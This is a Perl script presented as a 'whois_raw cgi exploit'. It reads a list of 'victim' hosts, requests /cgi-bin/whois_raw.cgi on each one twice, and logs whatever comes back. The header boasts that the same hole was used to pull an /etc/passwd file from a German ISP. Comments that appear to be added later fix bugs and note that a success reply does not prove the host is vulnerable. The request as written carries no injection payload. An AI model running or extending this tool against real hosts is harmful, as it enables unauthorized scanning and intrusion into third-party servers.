##########################################################################
#  This is a script that checks for the cgi whois_raw vulnerability.     #
# The idea was inspired after having pulled up an encrypted /etc/passwd  #
# file on a German ISP using the /cgi-bin/whois_raw.cgi? vulnerability.  #
#          This code was ripped from iisscan by Piffy.                   #
##########################################################################

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

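# Main script: confirm with the operator, read a list of hosts from a file,
# then request /cgi-bin/whois_raw.cgi on each host and record the responses.
#
# File-level state shared with second(): $def (the user agent), @victim (the
# host list) and the package variables $a (current index) and $b (host count).

# One user agent is reused for every request.  LWP::UserAgent sends a
# "libwww-perl/<version>" User-Agent header unless told otherwise, so these
# requests are easy to recognise in a web server's access log.
my $def = LWP::UserAgent->new;
my @victim;
my $userresp;

print "\nNeoErudition Technologies\n";
print "Whois_raw cgi exploit\n\n";
print "\nCoded by RatDance\n";
print "Enter Y or N to continue. [Y/N]: ";
while (1) {
    $userresp = <STDIN>;

    # At end of input <STDIN> returns undef; without this check the loop would
    # print the "not a valid answer" prompt forever.
    die "\nNo answer received on standard input.\n" unless defined $userresp;
    chomp $userresp;

    if ($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
        print "Continueing...\n";
        last;
    }
    elsif ($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
        print "Exiting as requested.\n";
        exit;
    }
    else {
        print "Thats not a valid answer. [Y/N]: ";
    }
}
print "\nWhat file contains the victim address: ";

my $list_file = <STDIN>;
die "\nNo file name received on standard input.\n" unless defined $list_file;
chomp $list_file;

# Three-argument open: the name typed by the operator is always treated as a
# plain path.  With two-argument open a name such as ">file" or "cmd |" would
# be interpreted as a mode or a command on the operator's own machine.
open(my $in, '<', $list_file) || die "\nCould not open $list_file: $!";

# $a and $b are the package variables second() also uses, so they are kept
# rather than replaced by lexicals.
$a = 0;
$b = 0;
while (my $host = <$in>) {
    chomp $host;
    $victim[$a] = $host;
    $a++;
    $b++;
}
close($in);
$a = 0;
print "whois raw exploit initiated..\n";
while ($a < $b) {
    my $url      = "http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
    my $request  = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # is_success is true for any 2xx status.  A hit therefore shows only that
    # the path answered, not that the host runs a vulnerable whois_raw.cgi;
    # logged hosts still need to be verified.
    if ($response->is_success) {

        # The body is remote-controlled data and is echoed unfiltered to the
        # terminal and to the log.
        print $response->content;

        # Method calls are not interpolated inside a double-quoted string, so
        # the body has to be concatenated; the original logged the object's
        # stringified address followed by "->content" instead of the body.
        if (open(my $log, '>>', 'exploit_whois.log')) {
            print {$log} "\n$victim[$a] : " . $response->content;
            close($log) or warn "Could not close exploit_whois.log: $!\n";
        }
        else {
            # Logging stays best-effort: report the failure and carry on.
            warn "Could not append to exploit_whois.log: $!\n";
        }
    }
    else {
        print $response->error_as_HTML;
    }

    # second() repeats the same request for this host and then advances $a,
    # so every host is contacted twice and the loop ends once $a reaches $b.
    second();
}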

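# second - request /cgi-bin/whois_raw.cgi on the current host and advance.
#
# Takes no arguments.  Reads the file-level $def (user agent) and @victim
# (host list), uses the package variable $a as the index of the current host,
# and increments $a before returning, which is what moves the caller's loop
# on to the next host.
sub second {
    my $url2     = "http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
    my $request  = HTTP::Request->new('GET', $url2);
    my $response = $def->request($request);

    # is_success is true for any 2xx status, so a hit means only that the path
    # answered; it does not confirm a vulnerable whois_raw.cgi.
    if ($response->is_success) {

        # The body is remote-controlled data, printed and logged unfiltered.
        print $response->content;

        # Method calls are not interpolated inside a double-quoted string, so
        # the body is concatenated; the original wrote the object's
        # stringified address followed by "->content" instead of the body.
        if (open(my $log, '>>', 'exploit_whois.log')) {
            print {$log} "\n$victim[$a] : " . $response->content;
            close($log) or warn "Could not close exploit_whois.log: $!\n";
        }
        else {
            # Logging stays best-effort: report the failure and carry on.
            warn "Could not append to exploit_whois.log: $!\n";
        }
    }
    else {
        print $response->error_as_HTML;
    }
    $a++;
}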






